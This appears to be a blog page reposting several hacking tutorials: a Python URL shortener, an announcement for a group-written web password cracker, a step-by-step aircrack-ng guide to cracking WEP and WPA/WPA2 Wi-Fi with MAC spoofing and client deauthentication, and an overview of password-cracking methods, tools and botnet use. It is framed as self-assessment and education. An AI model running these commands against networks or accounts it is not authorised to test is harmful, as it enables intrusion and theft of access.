Tuesday, 5 September 2017

Image result for Shorten URLs

HOW TOShorten URLs from the Command Line with Python

Shortening URLs has become a necessity in this age of Twitter and limited-character status updates. It not only allows us to cram more words into our oh-so-important Twitter statuses, but it also helps us with a few other things.
Some Benefits of URL Shorteners
We can create temporary URLs. The URLs created by a URL shortener are deleted after a certain period of inactivity. This is good for a link that we just want to show to a group of friends quickly.
Some URL shortening services allow analysis of link traffic (Google and Bitly come to mind). This can be good for website owners, or people who make money off of webhits. It could help them analyze where their traffic is coming from for a particular link, rather than analyze a website as a whole.
Posting longer status updates. People like me who use Twitter to promote their blog, or users who post links to news require every precious letter possible. Links tend to take up quite a few characters, so having URL shortener can be a godsend. It allows us to get our point across without spiraling downward into incoherent e-gibberish.
I often want to shorten my URLs from the command line. Opening another browser tab can take up too many resources for my liking. It also can load rather slow, and the JavaScript on the page that loads the shortened URL will often load improperly and not display the new URL. A URL shortener from the command line could also potentially allow us to convert big lists of links, as well as single ones, in a quick and simple manner. This Null Byte will help us do just that! Let's hack together some code in the Python programming language to shorten our URLs from the command line. This will go great in conjunction with our newly made Twitter command-line application.

Requirements

Python installed on your system.
Picking Our API
First off, we need to pick which API that we are going to code our Python application to communicate with. An API (Application Programming Interface) is basically the protocol for communicating with a web application's interface. This means that there is a specific standard and method for us to connect to the interface with that we must comply with.
After a bit of research, the easiest API would be the Google URL shortener. I picked it because it does not require registration, an account, or any public API keys. This will keep everything simple so you can easily understand it.
Code the Application
Here is what I came up with for a finished, cleanly coded and simplistic result. I named it url.py.
How to Shorten URLs from the Command Line with Python
Grab the source code here.
To use the program, we simply type the following command into a terminal while in the same directory as the saved url.py source code.
    python url.py "http://paste.url/between/quotes.kthx"
Code Breakdown
In the main function, gurl = is simply "curling" the data from the API URL. This is essentially all that we need.
Assign all of the appropriate variables needed.
The data returned from curling the Goo.gl API is printed out to the screen.
If you think coding looks cool, maybe you should try to join the Community Byte activites that we host weekly here at Null Byte.

Image result for Coding a Web-Based Password Cracker in Python

COMMUNITY BYTECoding a Web-Based Password Cracker in Python

Welcome to another Community Byte announcement! In the past two sessions, we have coded an IRC bot in Python capable of issuing commands. Since it can issue commands and most of you are new to programming, that project will stay idle for a while. Other commands such as voice and half-op can be easily hacked in via common sense, even if you weren't there for that session.
This week, I have something a bit more fun planned. We are all going to create a Python program to crack web-based passwords, like the ones you would see on an email or router login. This is going to be a very general and uniform password cracker, which should then be potentially modifiable to work for anything with a login on your browser.
Pretty cool, eh? To join this Community Byte, you have to pinky-swear that you'll join and idle in IRC forever! Just kidding.

Prerequisites

  • Python 2.7 installed on your computer.
  • An IRC client, like XChat.
  • Gobby, a real-time collaborative code editor.

How does this work?

We will be using IRC to round people up before we start to code. In IRC, I will assist whoever needs help connecting to the Gobby session. If you're new to IRC, go here to learn how to set it up and use it. I will be hosting a Gobby server for everyone to connect to, which allows us all to code in real-time, with everyone able to view and learn the code as we go along. Gobby makes coding with friends over long distance fun and easy.

When does it start?

The coding will take place every Friday at 5:00 pm PST, so be in IRC around that time. At the end of each session, I will post the code to the forums, and write a post about how it works, and what our code can do!

Project goals

  • The program can at least crack our test page.
  • Modular programming and variable-based so the tool can be hacked easily.
  • Everyone will learn a bit of Python.
  • Bring the community together and teach each other new things!
  • Get more people in IRC.
Get everyone you can to join IRC and start posting in the forums! Don't be shy, we don't bite, and the more people who idle 24/7, the more fun it is for all of us! I'm always there, so come say hello



Image result for How Hackers Steal Your Internet & How to Defend Against It


HOW TOHow Hackers Steal Your Internet & How to Defend Against It



I have had a lot of people ask me, "How does my neighbor keep getting into my wireless?!". Chances are, these people are all using WEP, a deprecated wireless encryption protocol. Either that, or you are using one weak WPA passphrase.
If someone can access your wireless network that easily, this is NOT a good thing. After someone cracks an access point, possibilities are limitless. There's SSL stripping, packet sniffing, MITM (Man-In-The-Middle) attacks, ARP poisoning—not to mention being completely anonymous by using someone else's Wi-Fi.

Proof of Concept

The theory behind cracking access points is simple. For WEP, you fake authentication with the access point to get it to send you packets, then send fragments of packets back to the AP (Access Point). In return, the AP will send a torrent of packets because they're broken. On a network, if a packet is broken, they get resent. When you capture the packets, some will have initialization vectors on them. An attacker captures as many of those as they can, then cracks away at them using an algorithm. WEP is algorithmically weak—after enough IVs, you can crack any password. No matter how long. No matter how complex.
WPA/2 is a little different. To crack a WPA/2 AP, you need to send a de-authentication packet to a connected client, and force it to re-authenticate. When it does this, capture the four-way handshake between them, as this contains the hash of the AP's password. This means: post handshake capture, you can do all your attacking offline.
WPA/2 has the fixed a vulnerability that was in WEP and has a required password length of an 8 character minimum. This means brute-forcing is nearly impossible. A dictionary attack is the only way to go. Dictionaries use a pre-generated list of words, and attempts each word, one by one. These don't necessarily have to be words, but any pre-generated string of ASCII characters.
In this Null Byte, I'm going to show you how to break into your own wireless network and assess its security so you can have a impenetrable network! This will be done in Linux, because Windows does not have open-source, injection capable drivers (WinPcap and USB wireless interfaces aside). For instructions on getting packet injection capable drivers in Linux, you will find a lovely tutorial, written by me for Null Byte here.
All of the commands in bold are Terminal commands.

Step 1 Spoofing a MAC Address

Before any smart cracker would attack your AP, they will always spoof their MAC (Media Access Control) address! Your MAC address is your wireless NIC's (Network Interface Card) unique identity! UNIQUE. That means if it was paid for with Mommy and Daddy's credit card, they'll know it's you behind the computer.
To spoof a MAC address, open a terminal and use these commands:
    sudo ifconfig wlan0 down
    sudo ifconfig wlan0 hw ether 46:75:63:6b:55:21
    sudo ifconfig wlan0 up
A frequent cracker would likely make a script out of this to do it quickly. You can put any hex number you want there for the MAC address you're spoofing to, mine is just an example.
To make sure your MAC changed, you would do:
    ifconfig
Then confirm that the "wlan0" interface matches what we put into the terminal.

Step 2 Finding Your AP

To find your AP, do a scan of local wireless APs:
    sudo iwlist wlan0 scan
Take note of the MAC address of the access point, as well as the channel it is on, you will need it later.

Step 3 Install Aircrack-NG

Install the aircrack-ng suite. It contains all the tools needed to assess your AP's security. In Arch Linux, it is:
    sudo pacman -S aircrack-ng 
And Ubuntu:
    sudo apt-get install aircrack-ng
Now, install the aircrack-ng scripts, because sometimes you won't be able to run airmon-ng, etc. from the terminal without them:
    sudo pacman -S aircrack-ng-scripts
And Ubuntu:
    sudo apt-get install aircrack-ng-scripts

Step 4 Cracking the Wireless AP

Now we are going to start the actual attack on the AP. You will need to replace the text in brackets with your corresponding info, which you should have written down.
Put your wireless interface into monitor mode, as this will allow it to sniff traffic:
    sudo airmon-ng start wlan0
-OR-
    sudo ifconfig wlan0 mode monitor
Your interface for monitoring should now be named "mon0". 
If you have a WEP encrpyted network, refer to "Cracking WEP" below. If you have a WPA or WPA2 network, skip this and go straight to "Cracking WPA & WPA2".

Cracking WEP

For WEP encryption, we need to fake authentication with the AP so it sends you traffic (note: if you cant authenticate, spoof your MAC to match one of the clients already connected to it. You can see the under "stations" in airodump-ng). Open another tab in your terminal, and type:
    sudo aireplay-ng -a [AP's MAC] -e [AP's SSID(name)] mon0
To start the live capture of airbourne packets:
    sudo airodump-ng --ivs -c [channel of AP] --bssid [AP's MAC address] -w [~/Desktop] mon0
Next, you need to fake-authentication with the AP:
    sudo aireplay-ng -a [AP's MAC] -e [AP's ESSID(name)] mon0
When you have fake-authenticated successfully, you should now start re-injecting packets:
    sudo aireplay-ng -3 -b [AP's MAC] -h [Your MAC] mon0
When it's done, you should see it generating large amounts of traffic in the airodump-ng window. After you get 20-100,000 packets or "Data", as airodump calls them, you should be ready to crack the password.
To crack your password, run this in the terminal:
     sudo aircrack-ng ~/Desktop/[capture file.cap]
When aircrack says "KEY FOUND", copy the key and remove the semi-colons from it. Congratulations! You just proved how easy it is for someone to crack your network. With a crafted tool, an attacker can crack your network in less than 60 seconds. I've done it numerous times.

Cracking WPA & WPA2

To get ready to capture a four-way handshake, start airodump-ng with this command:
    sudo airodump-ng -c [channel of AP] --bssid [AP's MAC] -w [~/Desktop/psk.cap] mon0
Now we need to de-authenticate a client to force them to reconnect and get a four-way handshake faster. Swich to airodump and look at the associated clients (look at the bottom). Copy the MAC address. It there aren't any, wait until someone connects, or try for a later date when you can have another computer connected. Here is the terminal command to force de-authentication:
    sudo aireplay-ng -0 15 -a [AP MAC] -c [Deauth client MAC] mon0
In airodump, you should see in the top-right corner text, "WPA Handshake" and shows a MAC address following it. Example:
How Hackers Steal Your Internet & How to Defend Against It
The handshake was captured and you can now disconnect from the network. If you didn't get the handshake, you might not be close enough to the client.
To crack the handshake:
    sudo aircrack-ng -w [~/path/to/dictionary/file.lst] [~/Desktop/psk-01.cap]
You can find great dictionaries for cracking on ThePirateBay or Packet Storm. I have over 20, depending on my situation. You can also use "coWPAtty", which uses Rainbow Tables to crack WPA handshakes. Rainbow Tables are pre-computed hashes with their corresponding passphrase. It's very effective. The Church of Wi-Fi has the best Rainbow Table set I've seen. However, the torrents are impossible to find now (due to lack of seeders). In order to get them, you need to buy the DVD set.
That's all there is to it. So, the bottom line is to use WPA2 with AES encryption in conjunction with an impossibly long password, like "71zJJmfbK50VgdmtjRVJuxcDJr5PVJJAAtG1mIBwbEUshkkO".
Questions? Post below, or start a thread in the forum.

Image result for How to Crack Passwords, Part 1 (Principles & Technologies)]


HACK LIKE A PROHow to Crack Passwords, Part 1 (Principles & Technologies)



Welcome back, my neophyte hackers!
I have already done a few tutorials on password cracking, including ones for Linux and Windows, WEP and WPA2, and even online passwords using THC Hydra. Now, I thought it might be worthwhile to begin a series on password cracking in general. Password cracking is both an art and a science, and I hope to show you the many ways and subtleties involved.
We will start with the basic principles of password cracking that are essential to ALL password cracking techniques, followed by some of the tools and technologies used. Then, one by one, I will show you how to use those principles and technologies effectively to crack or capture the various types of passwords out there.

The Importance & Methods of Password Cracking

Passwords are the most widely used form of authentication throughout the world. A username and password are used on computer systems, bank accounts, ATMs, and more. The ability to crack passwords is an essential skill to both the hacker and the forensic investigator, the latter needing to hack passwords for accessing the suspect's system, hard drive, email account, etc.
Although some passwords are very easy to crack, some are very difficult. In those cases, the hacker or forensic investigator can either employ greater computing resources (a botnet, supercomputer, GPU, ASIC, etc.), or they can look to obtain the password in other ways.
These ways might include insecure storage. In addition, sometimes you don't need a password to access password-protected resources. For instance, if you can replay a cookie, session ID, a Kerberos ticket, an authenticated session, or other resource that authenticates the user after the password authentication process, you can access the password protected resource without ever knowing the password.
Sometimes these attacks can be much easier than cracking a complex and long password. I will do a tutorial on various replay attacks in the near future (look out specifically for my upcoming article on stealing the Facebook cookie to access someone's Facebook account).
Now, let's start with the basics.

Step 1Password Storage

In general, passwords are not stored in clear text. As a rule, passwords are stored as hashes. Hashes are one-way encryption that are unique for a given input. These systems very often use MD5 or SHA1 to hash the passwords.
In the Windows operating system, passwords on the local system are stored in the SAM file, while Linux stores them in the /etc/shadow file. These files are accessible only by someone with root/sysadmin privileges. In both cases, you can use a service or file that has root/sysadmin privileges to grab the password file (e.g. DLL injection with samdump.dll in Windows).

Step 2Types of Attacks

Dictionary

A dictionary attack is the simplest and fastest password cracking attack. To put it simply, it just runs through a dictionary of words trying each one of them to see if they work. Although such an approach would seem impractical to do manually, computers can do this very fast and run through millions of words in a few hours. This should usually be your first approach to attacking any password, and in some cases, it can prove successful in mere minutes.

Rainbow Table

Most modern systems now store passwords in a hash. This means that even if you can get to the area or file that stores the password, what you get is an encrypted password. One approach to cracking this encryption is to take dictionary file and hash each word and compare it to the hashed password. This is very time- and CPU-intensive. A faster approach is to take a table with all the words in the dictionary already hashed and compare the hash from the password file to your list of hashes. If there is a match, you now know the password.

Brute Force

Brute force is the most time consuming approach to password cracking. It should always be your last resort. Brute force password cracking attempts all possibilities of all the letters, number, special characters that might be combined for a password and attempts them. As you might expect, the more computing horsepower you have, the more successful you will be with this approach.

Hybrid

A hybrid password attack is one that uses a combination of dictionary words with special characters, numbers, etc. Often these hybrid attacks use a combination of dictionary words with numbers appending and prepending them, and replacing letters with numbers and special characters. For instance, a dictionary attack would look for the word "password", but a hybrid attack might look for "p@$$w0rd123".

Step 3Commonly Used Passwords

As much as we think each of us is unique, we do show some common patterns of behavior within our species. One of those patterns is the words we choose for passwords. There are number of wordlists that have been compiled of common passwords. In recent years, many systems have been cracked and passwords captured from millions of users. By using these already captured passwords, you are likely to find at least a few on the network you are trying to hack.

Step 4Password Cracking Strategy

Many newbies, when they start cracking passwords, simply choose a tool and word list and then turn them loose. They are often disappointed with the results. Expert password crackers have a strategy. They don't expect to be able to crack every password, but with a well-developed strategy, they can crack most passwords in a very short amount of time.
The key to develop a successful strategy of password cracking is to use multiple iterations, going after the easiest passwords with the first iteration to the most difficult passwords using different techniques for each iteration.

Step 5Password Cracking Software

John

John the Ripper is probably the world's best known password cracking tool. It is strictly command line and strictly for Linux. Its lack of a GUI makes a bit more challenging to use, but it is also why it is such a fast password cracker.
One of the beauties of this tool is its built in default password cracking strategy. First, attempts a dictionary attack and if that fails, it then attempts to use combined dictionary words, then tries a hybrid attack of dictionary words with special characters and numbers and only if all those fail will it resort to a brute force.

Ophcrack

Ophcrack is a free rainbow table-based password cracking tool for Windows. It is among the most popular Windows password cracking tools (Cain and Abel is probably the most popular; see below), but can also be used on Linux and Mac systems.
Image by Ysangkok/Wikimedia Commons
It cracks LM and NTLM (Windows) hashes. For cracking Windows XP, Vista and Windows 7, you can download free rainbow tables. You can download Ophcrack on SourceForge, and you can get some free and premium rainbow tables for Ophcrack here.

L0phtCrack

L0phtCrack is an alternative to Ophcrack, and attempts to crack Windows passwords from hashes in the SAM file or the Active Directory (AD). It also uses dictionary and brute force attacks for generating and guessing passwords.
Image via L0phtCrack
L0phtCrack was acquired by Symantec and they promptly discontinued it in 2006. Later, L0phtCrack developers re-acquired this excellent password cracking tool and re-released it in 2009. You can download the tool here.

Cain and Abel

Cain and Abel just might be the best known password cracking tool on the planet. Written strictly for Windows, it can crack numerous hash types, including NTLM, NTLMv2, MD5, wireless, Oracle, MySQL, SQL Server, SHA1, SHA2, Cisco, VoIP, and many others.
Cain and Abel can crack passwords using a dictionary attack, rainbow attack, and brute force. One of its better features is the ability to select the password length and character set when attempting a brute force attack. And besides being an excellent password cracking tool, it is also a great ARP Poisoning and MiTM tool.

THC-Hydra

THC-Hydra is probably the most widely used online hacking tool. It is capable of cracking web form authentication, and when used in conjunction with other tools such as Tamper Data, it can be a powerful and effective tool for cracking nearly every type of online password authentication mechanism.
The initial help screen for Hydra.

Brutus

Brutus is an online password cracking tool that many consider the fastest online password cracker. It is free and available on both Linux and Windows, and it supports password cracking in HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet, and other types such as IMAP, NNTP, NetBus, etc.
Brutus has not been updated in quite awhile, but it can still be useful and since it is open source, you can update it yourself. Brutus can be downloaded here.

Aircrack-Ng

In my humble opinion, aircrack-ng is undoubtedly the best all-around Wi-Fi hacking software available. It is capable of cracking both WEP and WPA2, and it is also capable of doing the following, among many other things.
  1. Creating a Soft AP
  2. Creating an Evil Twin
  3. Creating a Rogue AP
  4. Conducting a DOS attack against a Wi-Fi AP
It is only available for Linux and requires a bit of a learning curve to master, but you will be richly rewarded for the time spent learning it. In addition, to be most effective you will need to use an aircrack-ng compatible wireless card, so check their extensive list before buying your card. You can find more info on aircrack-ng over in my Wi-Fi hacking series.
Aircrack-ng is built into BackTrack and Kali and can be downloaded here.

Step 6Password Cracking Hardware

Botnet

Password cracking is simply a function of brute force computing power. What one machine can do in one hour, two machines can do in a half hour. This same principle applies to using a network machines. Imagine what you can do if you could access a network of one million machines!
Some of the botnets available around the globe are more than a million machines strong and are available for rent to crack passwords. If you have a password that might take one year to crack with your single CPU, a million-machine botnet can cut that time to approximately 1 millionth the time, or 30 seconds!

GPU

GPUs, or graphical processing units, are much more powerful and faster than CPU for rendering graphics on your computer and for cracking passwords. We have a few tools built into Kali that are specially designed for using GPUs to crack passwords, namely cudahashcat, oclhashcat, and pyrit. Look for coming tutorials on using these tools and the GPU on your high-end video card to accelerate your password cracking.

ASIC

In recent years, some devices have been developed specifically for hardware cracking. These application-specific devices can crack passwords faster than over 100 CPUs working symmetrically.
(1) Bitfury boards by Black Arrow, (2) Butterfly Labs processor, (3) Inside the Butterfly Labs Monarch.